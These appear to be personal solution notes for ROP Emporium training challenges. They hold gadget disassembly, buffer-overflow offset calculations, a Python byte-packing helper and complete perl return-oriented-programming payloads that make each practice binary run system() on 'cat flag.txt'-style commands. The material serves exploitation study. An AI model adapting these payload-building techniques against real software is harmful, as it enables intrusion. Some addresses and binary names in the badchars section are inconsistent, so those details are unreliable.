import struct
def dumpx(x):
    """Render *x* as eight little-endian bytes written as ``\\xNN`` escapes.

    Args:
        x: integer packed with ``struct.pack('<Q', x)``; anything outside
           the unsigned 64-bit range makes ``struct`` raise ``struct.error``.

    Returns:
        The escape text (not raw bytes), e.g.
        ``'\\x3b\\x0b\\x40\\x00\\x00\\x00\\x00\\x00'`` for ``0x400b3b`` —
        the same form as the byte strings in the perl ``print`` lines below.
    """
    packed = struct.pack('<Q', x)
    return ''.join(f'\\x{byte:02x}' for byte in packed)
def d(x):
    """Print *x* as a perl ``print "...";`` statement of escaped bytes.

    Args:
        x: integer handed to ``dumpx`` (unsigned 64-bit; see its range note).

    Writes one line to stdout, e.g.
    ``print "\\x3b\\x0b\\x40\\x00\\x00\\x00\\x00\\x00";`` — the form used by
    the perl payload lines in these notes. Returns None.
    """
    escaped = dumpx(x)
    print(f'print "{escaped}";')
ropemporium
gadget-1: | |
0000000000400b34 movq %r12, (%r13) | |
0000000000400b38 ret | |
gadget 0: | |
0000000000400b3b popq %r12 | |
0000000000400b3d popq %r13 | |
0000000000400b3f ret | |
gadget 1: | |
0000000000400bb0 popq %r14 | |
0000000000400bb2 popq %r15 | |
0000000000400bb4 ret | |
gadget 2: | |
usefulGadgets: | |
0000000000400b30 xorb %r14b, (%r15) | |
0000000000400b33 ret | |
gadget 3: (mid-instruction) | |
0000000000400bb3 popq %rdi | |
0000000000400bb4 ret | |
gadget 4: | |
00000000004009e8 call j_system | |
data section starts at 0x601050 and size is 0x10 | |
❯ objdump -h write4 | grep \\.data | |
24 .data 00000010 0000000000601070 0000000000601070 00001050 2**3 | |
cat *xt\0 = \x63\x61\x74\x20\x2a\x78\x74\x00 | |
0x63 ('c') and 0x20 (space) are badchars, so the string can't be sent as-is: those two bytes go in xored with 7 and are restored in place afterwards,
so we'd xor at STR and STR+3
however, if we place STR at 0x601070, then we'd need to xor at 0x601073 | |
but 0x601073 is prohibited | |
so we'd place STR at 0x601071 | |
perl -e ' | |
print "x"x40; | |
print "\x3b\x0b\x40\0\0\0\0\0\x64\x61\x74\x27\x2a\x78\x74\x00\x71\x10\x60\0\0\0\0\0"; | |
print "\x34\x0b\x40\0\0\0\0\0"; | |
print "\xb0\x0b\x40\0\0\0\0\0\x07\x00\x00\x00\x00\x00\x00\x00\x71\x10\x60\0\0\0\0\0"; | |
print "\x30\x0b\x40\0\0\0\0\0"; | |
print "\xb0\x0b\x40\0\0\0\0\0\x07\x00\x00\x00\x00\x00\x00\x00\x74\x10\x60\0\0\0\0\0"; | |
print "\x30\x0b\x40\0\0\0\0\0"; | |
print "\xb3\x0b\x40\0\0\0\0\0\x71\x10\x60\0\0\0\0\0"; | |
print "\xe8\x09\x40\0\0\0\0\0"; | |
print "\n"; | |
' | ./badchars | |
pwned :) |
0x20 (32) local vars | |
0x08 ( 8) rbp | |
--- | |
0x08 ( 8) ret addr | |
0x100 (256) is read, so there are 0xd8 (216) bytes of overwrite
exactly what we need kek: | |
usefulGadgets: | |
0000000000401ab0 popq %rdi | |
0000000000401ab1 popq %rsi | |
0000000000401ab2 popq %rdx | |
0000000000401ab3 ret | |
0x28 (40) of garbage | |
0x20 0x401ab0, 0x1, 0x2, 0x3 | |
0x08 0x401850 | |
0x20 0x401ab0, 0x1, 0x2, 0x3 | |
0x08 0x401870 | |
0x20 0x401ab0, 0x1, 0x2, 0x3 | |
0x08 0x401810 | |
so, 0x28 * 3 of payload -- 0x78 (120) bytes | |
perl -e ' | |
print "x"x40; | |
print "\xb0\x1a\x40\0\0\0\0\0\x01\0\0\0\0\0\0\0\x02\0\0\0\0\0\0\0\x03\0\0\0\0\0\0\0"; | |
print "\x50\x18\x40\0\0\0\0\0"; | |
print "\xb0\x1a\x40\0\0\0\0\0\x01\0\0\0\0\0\0\0\x02\0\0\0\0\0\0\0\x03\0\0\0\0\0\0\0"; | |
print "\x70\x18\x40\0\0\0\0\0"; | |
print "\xb0\x1a\x40\0\0\0\0\0\x01\0\0\0\0\0\0\0\x02\0\0\0\0\0\0\0\x03\0\0\0\0\0\0\0"; | |
print "\x10\x18\x40\0\0\0\0\0"; | |
' | ./callme |
j_system: // system | |
00000000004005e0 jmpq *system@GOT | |
---- | |
00000000004008c3 popq %rdi | |
00000000004008c4 ret | |
---- | |
questionableGadgets: | |
0000000000400820 popq %r15 | |
0000000000400822 xorq %r11, %r11 | |
0000000000400825 popq %r14 | |
0000000000400827 movl __data_start, %edi | |
000000000040082c ret | |
000000000040082d popq %r14 | |
000000000040082f xorq %r12, %r11 | |
0000000000400832 popq %r12 | |
0000000000400834 movl $0x604060, %r13d | |
000000000040083a ret | |
000000000040083b movl __data_start, %edi | |
0000000000400840 xchgq %r10, %r11 | |
0000000000400843 popq %r15 | |
0000000000400845 movl system@@GLIBC_2.2.5, %r11d | |
000000000040084b ret | |
000000000040084c popq %r15 | |
000000000040084e movq %r11, (%r10) | |
0000000000400851 popq %r13 | |
0000000000400853 popq %r12 | |
0000000000400855 xorb %r12b, (%r10) | |
0000000000400858 ret | |
--- | |
0000000000400845 * movl $0x602050, %r11d | |
000000000040084b x ret | |
--- | |
0000000000400832 x * popq %r12 | |
0000000000400834 movl $0x604060, %r13d | |
000000000040083a x ret | |
--- | |
000000000040082f * xorq %r12, %r11 | |
0000000000400832 x * popq %r12 | |
0000000000400834 movl $0x604060, %r13d | |
000000000040083a x ret | |
--- | |
0000000000400840 * xchgq %r10, %r11 | |
0000000000400843 x popq %r15 | |
0000000000400845 * movl $0x602050, %r11d | |
000000000040084b x ret | |
--- | |
000000000040082f * xorq %r12, %r11 | |
0000000000400832 x * popq %r12 | |
0000000000400834 movl $0x604060, %r13d | |
000000000040083a x ret | |
--- | |
000000000040084e * movq %r11, (%r10) | |
0000000000400851 x popq %r13 | |
0000000000400853 x * popq %r12 | |
0000000000400855 * xorb %r12b, (%r10) | |
0000000000400858 x ret | |
--- | |
00000000004008c3 x * popq %rdi | |
00000000004008c4 x ret | |
--- | |
00000000004005e0 jmpq *system@GOT | |
--- | |
24 .data 00000010 0000000000601050 0000000000601050 00001050 2**3 | |
CONTENTS, ALLOC, LOAD, DATA | |
cat *xt\0 = \x63\x61\x74\x20\x2a\x78\x74\x00 | |
0x74782a20746163 ^ 0x602050 = 0x74782a20144133 | |
\x33\x41\x14\x20\x2a\x78\x74\x00 | |
0x601050 | |
0x601050 ^ 0x602050 = 0x3000 | |
\x00\x00\x00\x00\x00\x00\x30\x00 | |
perl -e ' | |
print "x"x40; # filling | |
print "\x45\x08\x40\x00\x00\x00\x00\x00"; # ret to 0x0000000000400845 | |
print "\x32\x08\x40\x00\x00\x00\x00\x00"; # ret to 0x0000000000400832 | |
print "\x00\x30\x00\x00\x00\x00\x00\x00"; # 0x601050 ^ 0x602050, to pop into r12 | |
print "\x2f\x08\x40\x00\x00\x00\x00\x00"; # ret to 0x000000000040082f | |
print "\x33\x41\x14\x20\x2a\x78\x74\x00"; # 0x74782a20746163 ^ 0x602050, to pop into r12 | |
print "\x40\x08\x40\x00\x00\x00\x00\x00"; # ret to 0x0000000000400840 | |
print "\xde\xad\xfa\xce\xca\xfe\xba\xbe"; # garbage for r15 | |
print "\x2f\x08\x40\x00\x00\x00\x00\x00"; # ret to 0x000000000040082f | |
print "\xde\xad\xfa\xce\xca\xfe\xba\xbe"; # garbage for r12 | |
print "\x4e\x08\x40\x00\x00\x00\x00\x00"; # ret to 0x000000000040084e | |
print "\xde\xad\xfa\xce\xca\xfe\xba\xbe"; # garbage for r13 | |
print "\x00\x00\x00\x00\x00\x00\x00\x00"; # zeros for r12, to xor with *(%r10) | |
print "\xc3\x08\x40\x00\x00\x00\x00\x00"; # ret to 0x00000000004008c3 | |
print "\x50\x10\x60\x00\x00\x00\x00\x00"; # 0x601050, to pop into rdi | |
print "\xe0\x05\x40\x00\x00\x00\x00\x00"; # ret to 0x00000000004005e0 | |
' | ./fluff |
0x20 (32) local vars | |
0x08 ( 8) rbp | |
--- | |
0x08 ( 8) ret addr | |
0x60 (96) is read, so there are 0x38 (56) bytes of overwrite
'popq %r15' is | |
datgadget: | |
0000000000400883 popq %rdi | |
0000000000400884 ret | |
at 0x601060: "/bin/cat flag.txt" | |
perl -e ' | |
print "x"x40; # filler | |
print "\x83\x08\x40\0\0\0\0\0"; # ret to datgadget | |
print "\x60\x10\x60\0\0\0\0\0"; # addr of string to pop into rdi | |
print "\x10\x08\x40\0\0\0\0\0"; # ret to call system | |
' | ./split |
gadget 1: | |
0000000000400890 popq %r14 | |
0000000000400892 popq %r15 | |
0000000000400894 ret | |
gadget 2: | |
usefulGadgets: | |
0000000000400820 movq %r15, (%r14) | |
0000000000400823 ret | |
gadget 3: (mid-instruction) | |
0000000000400893 popq %rdi | |
0000000000400894 ret | |
gadget 4: | |
0000000000400810 call j_system | |
data section starts at 0x601050 and size is 0x10 | |
❯ objdump -h write4 | grep \\.data | |
24 .data 00000010 0000000000601050 0000000000601050 00001050 2**3 | |
cat flag = \x63\x61\x74\x20\x66\x6c\x61\x67 | |
.txt\0 = \x2e\x74\x78\x74\x00\x00\x00\x00 | |
perl -e ' | |
print "x"x40; | |
print "\x90\x08\x40\0\0\0\0\0\x50\x10\x60\0\0\0\0\0\x63\x61\x74\x20\x66\x6c\x61\x67"; | |
print "\x20\x08\x40\0\0\0\0\0"; | |
print "\x90\x08\x40\0\0\0\0\0\x58\x10\x60\0\0\0\0\0\x2e\x74\x78\x74\x00\x00\x00\x00"; | |
print "\x20\x08\x40\0\0\0\0\0"; | |
print "\x93\x08\x40\0\0\0\0\0\x50\x10\x60\0\0\0\0\0"; | |
print "\x10\x08\x40\0\0\0\0\0"; | |
' | ./write4 |